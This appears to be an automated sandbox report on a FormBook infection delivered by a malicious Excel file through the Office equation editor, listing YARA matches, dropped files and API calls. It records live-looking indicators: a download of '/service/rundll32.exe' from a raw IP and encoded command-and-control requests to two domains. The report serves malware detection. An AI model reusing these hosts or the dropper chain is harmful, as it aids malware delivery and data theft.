55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emfJump to behavior
            Source: unknownDNS traffic detected: queries for: www.paradisgrp.com
            Source: global trafficHTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 16 ' 000g" " . - yellow bar above 17 ""-t This document is 3. Once you ha
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeJump to dropped file
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 4_2_01007C034_2_01007C03
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0100502D4_2_0100502D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004200984_2_00420098
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004201A04_2_004201A0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004254484_2_00425448
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004255084_2_00425508
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042B5A04_2_0042B5A0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004255B84_2_004255B8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042AFD04_2_0042AFD0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004270184_2_00427018
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004204E14_2_004204E1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004287994_2_00428799
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004258914_2_00425891
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042D9C84_2_0042D9C8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042D9B94_2_0042D9B9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00420A194_2_00420A19
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042AFC14_2_0042AFC1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA00484_2_00FA0048
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA00474_2_00FA0047
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA419A4_2_00FA419A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA56FD4_2_00FA56FD
            Source: C:\Users\Public\vbc.exeCode function: 4_2_010088314_2_01008831
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041E9935_2_0041E993
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8A5_2_00402D8A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409E305_2_00409E30
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DFD05_2_0041DFD0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0100502D5_2_0100502D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_01007C035_2_01007C03
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4E0C65_2_00A4E0C6
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A7D0055_2_00A7D005
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A530405_2_00A53040
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A6905A5_2_00A6905A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4E2E95_2_00A4E2E9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AF12385_2_00AF1238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4F3CF5_2_00A4F3CF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A763DB5_2_00A763DB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A523055_2_00A52305
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A9A37B5_2_00A9A37B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A573535_2_00A57353
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A854855_2_00A85485
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A614895_2_00A61489
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A6C5F05_2_00A6C5F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5351F5_2_00A5351F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A546805_2_00A54680
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5E6C15_2_00A5E6C1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AF26225_2_00AF2622
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5C7BC5_2_00A5C7BC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AD579A5_2_00AD579A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A857C35_2_00A857C3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AEF8EE5_2_00AEF8EE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A7286D5_2_00A7286D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5C85C5_2_00A5C85C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A529B25_2_00A529B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AF098E5_2_00AF098E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_010088315_2_01008831
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027C12388_2_027C1238
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271E2E98_2_0271E2E9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0276A37B8_2_0276A37B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027273538_2_02727353
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027223058_2_02722305
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027463DB8_2_027463DB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271F3CF8_2_0271F3CF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0273905A8_2_0273905A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027230408_2_02723040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0274D0058_2_0274D005
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271E0C68_2_0271E0C6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027C26228_2_027C2622
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272E6C18_2_0272E6C1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027246808_2_02724680
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027557C38_2_027557C3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272C7BC8_2_0272C7BC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027A579A8_2_027A579A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027554858_2_02755485
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027314898_2_02731489
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272351F8_2_0272351F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0273C5F08_2_0273C5F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027D3A838_2_027D3A83
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02747B008_2_02747B00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027ADBDA8_2_027ADBDA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271FBD78_2_0271FBD7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027CCBA48_2_027CCBA4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0274286D8_2_0274286D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272C85C8_2_0272C85C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027BF8EE8_2_027BF8EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027A59558_2_027A5955
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027369FE8_2_027369FE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027229B28_2_027229B2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027C098E8_2_027C098E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0273EE4C8_2_0273EE4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02752E2F8_2_02752E2F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0274DF7C8_2_0274DF7C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02730F3F8_2_02730F3F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272CD5B8_2_0272CD5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02750D3B8_2_02750D3B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027BFDDD8_2_027BFDDD
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A4DF5C appears 67 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A9373B appears 144 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A93F92 appears 60 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00ABF970 appears 48 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0271E2A8 appears 38 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0276373B appears 238 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 02763F92 appears 108 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0271DF5C appears 106 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0278F970 appears 81 times
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419D50 NtCreateFile,5_2_00419D50
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E00 NtReadFile,5_2_00419E00
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E80 NtClose,5_2_00419E80
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,5_2_00419F30
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419D4A NtCreateFile,5_2_00419D4A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E7C NtClose,5_2_00419E7C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F2A NtAllocateVirtualMemory,5_2_00419F2A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A400C4 NtCreateFile,LdrInitializeThunk,5_2_00A400C4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40078 NtResumeThread,LdrInitializeThunk,5_2_00A40078
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00A40048
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3F9F0 NtClose,LdrInitializeThunk,5_2_00A3F9F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3F900 NtReadFile,LdrInitializeThunk,5_2_00A3F900
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_00A3FAE8
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00A3FAD0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_00A3FBB8
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00A3FB68
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00A3FC90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_00A3FC60
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,5_2_00A3FD8C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00A3FDC0
